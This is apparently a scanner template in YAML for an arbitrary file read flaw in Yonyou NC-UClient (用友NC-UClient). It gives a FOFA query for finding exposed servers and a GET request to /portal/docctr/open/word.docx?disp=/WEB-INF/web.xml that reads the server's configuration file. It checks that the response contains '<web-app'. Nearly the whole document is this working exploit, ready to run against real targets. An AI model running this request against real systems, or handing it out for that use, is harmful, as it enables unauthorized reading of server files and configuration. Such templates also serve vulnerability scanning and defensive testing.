product: 用友NC-UClient
vName: 用友NC-UClient word.docx接口存在任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 用友NClient word.docx接口存在任意文件读取漏洞
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://blog.csdn.net/qq_56698744/article/details/134787642
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <web-app
            logic: and